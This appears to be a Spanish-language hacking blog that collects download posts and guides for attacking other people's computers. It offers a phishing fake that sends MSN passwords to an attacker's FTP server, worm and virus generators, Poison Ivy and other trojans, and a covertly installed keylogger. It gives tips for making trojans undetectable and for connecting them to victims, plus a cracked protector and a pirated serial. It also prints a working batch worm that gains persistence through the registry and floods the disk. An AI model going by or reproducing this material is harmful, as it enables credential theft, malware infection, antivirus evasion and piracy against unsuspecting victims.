GhostMsn

Ghost msn es un fake avanzado para msn. Con la caracteristica especial que permite enviar las contraseñas de msn a un servidor FTP.
Cuando la victima abra el fake le saldra un error diciendo que no se cargaron las opciones (ustedes pueden configurar este mensaje a su gusto). Entonces cuando la victima se conecte con su id de passport su contraseña sera enviada a nuestro servidor ftp.
Con el GhostMSN Builder creamos el fake del live msn, para ello debemos colocar nuestro servidor ftp usuario y pasword (se pueden crear una cuenta en miarroba.com o en www.ueuo.com)
Es la primera version de este fake, por lo que puede tener errores, yo ya encontre algunos.
Para que la victima caiga hay que saber utilizar un pokito la cabeza, o bien adjuntar el fake a un archivo batch que reemplaze el msn "original" por el fake.

Acerca del programa:

Version: 1.0
Tamaño: 800Kb
Plataforma: Tested unicamente enे Windows Xp
Works On MSN: Built based on Wlm8.5
Dependencias: Visual Basic Runtimes (las incluyo al final)
compilado el 24/12/07

Limitaciones:
Custom Message: 49 Caracteres
FTP URL: 50 Caracteres
FTP Username: 29 Caracteres
FTP Password: 14 Caracteres

Descarga:
GhostMSN V1.0 (Pagina oficial, sin dependecias)
GhostMSN V1.0 (subido por mi con todas las dependencias)
GhostMSN V1.0 (mirror rapidshare)

Pagina oficial: http://unexplained.tk/

Generador de Worms en batch By Hendrix

Les presento la primera version del Generador de Worms de Hendrix.

Parece medio viejito pero funciona a la perfeccion y es dificil encontrar programas como este.

Caracteristicas:

1. Propagación por P2P
2. Mensage al iniciarse
3. Agregarse al Registro
4. Infectar archivos .rar
5. Borrar archivos
6. Manipular red LAN
7. Añadir Usuario y Pass
8. Copiarse y Ocultarse
9. Descargar archivo en la victima
10. Informacion adicional
11. Salir

Pueden ver un manual de este programita AQUI. Si lo van a utilizar les recomiendo que lo lean, es cortito y simple

Descarga:
Generador de Worms en batch By Hendrix (Descarga oficial del autor)
Mirror google pages

Manual:
Manual Generador de Worms en batch By Hendrix

Manual dejar indetectables troyanos (facil)

En este manual se ve una de las maneras mas faciles de dejar indetectable un troyano a varios antivirus, utilizando el themida, el Lord-Pe, el iexpress y el resource hacker.
Posteo este manual ya que varios me pidieron que ponga algo mas facil. Si quieren algo mucho mas efectivo pero un poquito mas dificil, pueden ver el metodo meepa.

Descarga en pdf:
Manual dejar indetectables troyanos
mirror rapidshare

Iexpress para fines hacking

IExpress es una sencilla aplicacion incluida en el windows xp de Microsoft que incluye un Asistente para crear archivos comprimidos autodescomprimibles y autoejecutables. Podemos llamar al Asistente si ejecutamos directamente iexpress. Aunque esta en ingles, es muy facil de utilizar. Se que mas de alguno habra escuchado hablar de el, aunque un gran porcentaje de los que usan windows xp desconoceran de su existencia y uso.(en este caso para fines hacking)

Le podemos dar muchos usos de acuerdo a nuestras intensiones:
Cuando descargamos un programa no instalable, por ejemplo en un archivo zip que contiene todo el programa, suele contener muchos archivos y carpetas necesarios para su correcto funcionamiento, y no sabemos bien cómo ni dónde guardar estas carpetas, y a veces hasta se hace difÃcil encontrar el setup que ejecuta la aplicación entre la maraña de archivos. Lo mejor en estos casos es crearse un paquete ejecutable con el nombre de la aplicación, guardarlo en el sitio comodo para nosotros y olvidarnos de aquellas carpetas llenas de archivos.

Como binder indetectable:
Juntamos nuestro server (troyano) y una foto, por ejemplo: Creamos el instalador, y listo, 2 clicks y mientras vemos la foto se instala nuestra servidor silenciosamente

Normalmente lo encontramos En: Inicio/ Ejecutar/(escribimos) iexpress/ aceptar

Por defecto viene en ingles, y he de imaginar que a mas de alguno no le entendera, pero como ando de buenas XD aqui les dejo el iexpress traducido al español por POLIFEMO.

DESCARGA IEXPRESS ESPAÑOL AQUI!!

En caso de que no quieras bajar el IExpress traducido aqui te dejo un tuto publicado en el blog de como utilizarlo en ingles:

Manual del iexpress

Tambien puedes ver un video tutorial MUY BUENO en flash para ver como lo utilizan:

Ver videotutorial del iexpress

Y aqui un resultado: server+Themida y server+Themida+IExpress

Como ven la tasa de deteccion se redujo a la mitad y todo gracias al IExpress.

(El troyano del ejemplo es el SpyOne v 1.0.2FIX, solo (sin ninguna proteccion), lo ven hasta los ciegos XD

FUENTE: http://walhez.com

VideoTutorial: Demostrando como entrar a un PC por IP, por ARP by RaKi0N

Bueno, aquí os dejo un video donde se ve claramente como entrar al pc de otro por medio de la IP, llamado ARP, no explico como hacerlo, pero en el video se ve claramente la visualización de un PC remoto por medio de este protocolo, ya explicaré como hacer esto.

Poison Ivy 2.1.4 Version Privada

Salio a luz La version privada del poison ivy 2.1.4, al server solo sin encriptar ni nada lo detectan solo 5 antivirus que nadie usa.
Si lo encriptan con themida 1.8.5.5 lo detecan solo 3 antivirus pero no como troyano, sino como bot o como archivo encriptado. Lo malo de estas versiones privadas es que no vienen de la pagina del creador por lo tanto podrian tener "regalito", yo me arriesgue y lo probe, y funciona de maravilla creo que me voy a quedar con este.
Por lo visto el cliente es exactamente el mismo, lo unico que cambio es que es mas indetectable.

Descarga:
Poison Ivy 2.1.4 version privada (google pages)
Poison Ivy 2.1.4 version privada (mirror rapidshare)

Radmin 3.1 Control Remoto

Remote Administrator (Radmin) es un reconocido software de control remoto seguro, permite trabajar en un equipo remoto como si estuviera sentado enfrente. Este programa es la solución de acceso remoto ideal. Puede tener acceso al mismo equipo desde varias ubicaciones y utilizar transferencia de archivos avanzada, chats de voz y texto, Telnet, soporte de sistema de seguridad NT y otras características. Radmin supera a otros controles remotos en velocidad, fiabilidad y seguridad.
Esta aplicacion no es un troyano, por lo tanto es %100 indetectable. La captura de pantalla es muchisimo mas rapida y de mejor calidad que la de cualquier troyano.
Pero usando un poco la cabeza se lo puede convertir en troyano. Proximamente hare un manual de como troyanizarlo al radmin.

Descarga Radmin: Radmin 3.1 Control Remoto (Pagina oficial)
Pagina oficial: http://www.radmin.es/

Cactus Joiner 2.71 BETA Release

Cita de madantrax:
El nuevo Cactus Joiner 2.71 está a puntito de salir, se ha programado desde el principio todo el código del stub (cactus.dll) para evitar la heurística de los AV y se han añadido numerosas funciones nuevas.
Aprovecho y me tomo el lujo de sacar una versión de prueba (BETA) de lo que será el nuevo entorno gráfico del Cactus, se ha diseñado de nuevo toda la interfaz (gracias a wvb por los gráficos). Me gustaría que descargarais esta nueva versión y la probarais en vuestros equipos, necesito buscar:

• Fallos en el diseño, problemas de visualización.
  
• Fallos de ortografía (que hay muchísimos!).
  
• Fallos en el código (al dar un botón provoca un error, no hace la función apropiada, etc...).
  
• Mejoras para añadir en cuanto a funciones.
  
• Mejoras para añadir en cuanto a diseño o distribución.
  
• Críticas y sugerencias
  

Cosas para fijarse en esta nueva versión 

• Se puede mover la ventana del Cactus Joiner pulsando encima del logotipo y arrastrando (hace efecto de transparencia).
  
• No necesita el archivo COMDLG32.OCX para funcionar
  
• El botón "News & Updates" abre una ventana de Internet
  
• La barra de % es aleatoria al iniciar el Cactus
  
• Se han diseñado nuevas Opciones Avanzadas
  
• El listado de los archivos añadido soporta iconos reales
  
• Se han añadido nuevas opciones en el menú contextual del listado de archivos
  

Bueno, eso es todo. Si alguien encuentra algo más para criticar/mejorar/comentar que lo haga. Los usuarios que más aporten en este post serán añadidos como BetaTesters.

A los usuarios que reporten un problema/bug, necesito saber que versión de Windows utilizáis y que Service Pack tenéis instalado, RAM, etc...

Imagenes:

Quiero ser beta tester (debes ser usuario del hakcer.net o registrarte.)
Cactus Joiner 2.5

Private exe Protector 2.30

Private exe protector - Potente protector polimórfico de 32 bits para aplicaciones windows. Soporta todos los lenguajes populares de programación Asm, C++, VC++, Delphi y otros. Este programa provee a los desarrolladores protección de sus programas contra ingeniería reversa, análisis, modificaciones y cracking. Private exe Protector usa un motor metamórfico y polimórfico (los sniffers nunca podrán detectar la firma), algorítmo de compresión LZMA, potentes trucos antidepuración, importación de virtualizaciones, tecnología de robo de bytes, tecnología de robo de recursos (¡primer protector que usa esto!), algoritmo de encriptación de 256 bits AES, licenciamiento (encripción clave/código), SDK.

Lo probe con el bifrost y funciona mejor que el themida, lo detectan menos antivirus y el server pesa muchisimo menos.

Descarga: Private exe Protector 2.30
Pagina del programa: www.setisoft.com

Posibles causas por las que un server no se conecta

Estas son las posibles causas por la que un servidor de troyano no se conecta. Creado por ratero93

- Podría estar mal configurado. Prueba a auto-infectarte con el server ya protegido y bindeado, es la mejor manera de ver si el server está bien configurado. Si además lo haces con el antivirus y el firewall funcionando, podrás comprobar también si lo detecta el AV.

- Algunos troyanos funcionan mal si tú también estás infectado, así que una vez comprobado que funciona, desinstálalo desde el mismo cliente.

-Puedes no tener abiertos correctamente los puertos de tu router (es lo más habitual). Es muy importante que los abras hacia el ordenador donde estás usando el cliente. Me explico: cuando tienes varios ordenadores conectados a un router, cada uno de ellos tiene su propia IP, por lo que debes abrir los puertos hacia el ordenador desde el que vas a usar el troyano.
Para saber la IP del ordenador en cuestión, vé a la consola del MSDOS y ahí tecleas "ipconfig". Te saldrá la dirección IP del ordenador y esa es la que tienes que especificar al abrir los puertos del router.
Ocasionalmente (a mi me ha ocurrido), el ordenador desde el que utilizo el troyano puede cambiar la ip y no ser la que especifiqué en el router al abrir los puertos. Normalmente lo he solucionado apagando el ordenador y encendiéndolo de nuevo, prueba a ver.

-Puedes no tener bien configurado el NO-IP.
Haz click en el botón OPTIONS y en la pestaña CONNECTION te salen dos casillas, una pone OVERRIDE AUTOMATIC CONNECTION DETECTION y la otra OVERRIDE AUTOMATIC IP DETECTION.Prue ba a marcarlas y desmarcarlas, igual el problema está ahí. En mi caso, cuando instalo el server en mi propio ordenador para ver si funciona, debo marcar las dos pero cuando espero conexiones de servers enviados, debo dejarlas desmarcadas.
Por cierto, debajo de las casillas a marcar, sale un desplegable en el que deberían aparecer los distintos adaptadores que tienes instalados en tu ordenador para conectar el router. Asegúrate también de tener seleccionado el correcto si te sale más de uno.

-Puedes no tener los mismos settings en el server que en el cliente. Me explico: un error muy habitual es configurar el server para que conecte a través del puerto AAAA (es un ejemplo). Luego resulta que el cliente tiene a la escucha el BBBB y aunque todo funciona correctamente, por ese pequeño detalle, el server no se conecta. O sea, que anotad qué puerto le habéis dado al server y revisad que sea el mismo que está escuchando en el cliente. (Gracias a TxShAcK por recordar este posible error)

- Y por último pero no menos importante, hay que tener en cuenta que nuestra víctima puede tener un antivirus o un firewall que funcionen correctamente y que detecten el troyano, eliminándolo o no permitiendo que se conecte.

Fuente: http://foro.portalhacker.net/index.php/topic,54253.0.html

Manual bifrost completo por mandiubi

Manual completisimo del bifrost, creado por mandiubi viene incluido desde como crear el server hasta realizar toda su configuracion paso por paso, item por item. El archivo esta en pdf.

Descarga rapidshare
Mirror miarroba.com

Video: crear un gusano en batch

Video de como crear un virus gusano en batch desde 0. Ideal para novatos en el tema.



Codigo:
_____________________________________________
@echo off
copy %0%windir%\system32\worm.bat
REG ADD HKLM\software\microsoft\windows\currentversion\run /v hack
/d %windir%\system32\worm.bat
:worm
cd\
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm
_____________________________________________

si ejecutas el archivo worm.bat se crearan archivos infinitos en nuestro pc.
nuestro worm se autocopiara en el directorio
c:\windows\system32\worm.bat
cada ves que se incie el pc y la segunda linea es para agregar una entrada al registro lo kual iniciara el virus kada ves ke se inicie sesion.

Método MEEPA by MazarD

Un tutorial práctico sobre como hacer indetectable un troyano modificando sus firmas, este método resuelve los principales problemas del método RIT de hackxcrack como las firmas en encriptaciones o la imposibilidad de automatizar el proceso. Está enfocado a gente con pocos o nulos conocimientos sobre ensamblador. También subo un zip con una herramienta y el troyano para seguir el tutorial.
Publicado en la e-zine InSecurity

Leer Metodo MEEPA en pdf

Herramientas

Fuente: http://mzrd.martes13.net

T2W (TrojanToWorm) 1.2

Les presento TrojanToWorm, una aplicacion que sirve para propagar tu troyano mediante discos extraibles.

cita de Karcrack:
Crea un Autorun y se copia a si mismo(Poniéndoles atributos de oculto y sistema).Después en la maquina en la que se enchufe el PenDrive quedara infectada con el Worm(Gusano) haciendo que siga la infección con el troyano y el worm.

Características:
-Une cualquier fichero con el stub transformándolo en gusano.
-Permite seleccionar el nombre del Pendrive intocable.
-Permite seleccionar la fecha en la que el gusano caduca y deja de infectar Pendrives.
-Cuatro sistemas de inicio con Windows: Load, Shell, UserInit, Scripting
-Otras mejoras y optimizaciones.
-El stub tiene MuteX
-Encriptación

Descargas:
Sin dependencias:
Rapidshare
Gigasize

Con dependencias:
Rapidshare
Gigasize

kuang II 4ever

este troyano lo saque de un ezine y le hice algunas modificaciones para que no fuera tan facil de detectar. El infector.exe infecta el ejecutable que tu quieras y lo envias a la victima.. despues te conectas a traves del cliente y eso es todo. DONDE ESTÁ LA GRACIA DE ESTE TROYANO!! Y LA P** MADRE... trankilo.. no os escandaliceis... la gracia es que cuando la victima se infecta.. este troyano infecta a todos los demas archivos de la pc y Aunque borre el original tendria que borrar todo lo que tiene como para deshacerse de el XD pero trankilo... es controlable... si te autoinfectas.. puedes desinfectarte con el mismo cliente. Ademas infecta el kernel entre otras cosas XD

Descarga kuang II 4ever

Ardamax Keylogger 2.8

Ardamax Keylogger es una utilidad que captura toda la información introducida a través del teclado, guardándola inmediatamente en un fichero log que puedes revisar cuando quieras.

De esta forma, puedes estar al tanto del uso que se le da a tu PC cuando no estás presente, o puedes controlar las andanzas de tus hijos en Internet.

Puedes configurar el programa para que guarde el log en formato TXT o HTML, y grabar también detales como la fecha y hora de la captura del texto, y qué aplicación se estaba usando.

Además, tienes la opción de ejecutar el programa en modo "oculto", que lo hace totalmente invisible al usuario, y permite controlarlo sin que éste se dé cuenta. Otra función interesante es la posibilidad de enviar los ficheros log con los datos guardados a una determinada dirección de correo electrónico cada cierto tiempo: perfecto para seguir vigilando incluso a distancia!

Imagen de la pantalla prinsipal:

Descargar Ardamax Keylogger 2.8 (418Kb desde la pagina del autor ardamax.com)

Les dejo el serial del ardamax keylogger 2.8. Ponerolo antes de instalarlo remotamente

Name : h4xbr
Serial: PEEIUROHJBTBEHF

Video: Ocultar Archivos dentro de JPG’s

Pues bien, parece algo increible o extrano el saber que podemos ocultar archivos dentro de cualquier imagen JPG, solo es necesario un compresor como 7-Zip y una linea de comandos (CMD) podremos lograr esta accion.
Vean el video.

Rapid Hacker v3.0

Tienes Ip fija no podes descargar simultaneamente de rapidshare?. Este programa de facil manejo te ayudará a bajar simultaneamente los archivos que quieras.

Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.

Descarga Rapid Hacker v3.0

Themida v1.8.5.5 [Crackeado]

Bueno gente aca les dejo el Themida 1.8.5 full, listo para usar, crackeado..Pronto hare una guia.



Themida es una aplicación destinada a la protección del software frente a la piratería.

El programa encapsula el código fuente de la aplicación en diferentes partes y las encripta de forma individual. Finalmente, añade una protección global al conjunto del ejecutable.

La tecnología empleada por Themida se denomina SecureEngine, que consiste en una serie de medidas anti-cracking que se añaden a los ejecutables y que sólo permiten la ejecución del programa en un entorno seguro.

Algunas de las características de Themida son las siguientes:
- Técnicas antidepuradores que detectan el uso de depuradores.
- Técnicas para evitar el volcado de memoria en disco.
- Algoritmos de encriptación distintos para cada aplicación.
- Descompilación y ofuscación del código en la aplicación protegida.
- Técnicas antidesambladores, y mucho más.

Descarga Themida v1.8.5.5 [Crackeado]

Terabit Virus Maker 2.8 SE

Hoy dejo un poderoso creador de virus, el Terabit Virus Maker 2.8 se (la ultima version). Es muy facil de utilizar, y muy dañino. Dejo un video en ingles para que vean mas o menos como se lo utliza.



Imagen de pantalla prinsipal:



PD: Cuando creen el virus no se olviden de pasarle el themida para hacerlo indetectable.

Descargar Terabit Virus Maker (Link Arreglado y cambiado a rapidshare, funciona, comprobado por mi)

Si tienen problemas con la descarga dejen un comentario. Y cambio el link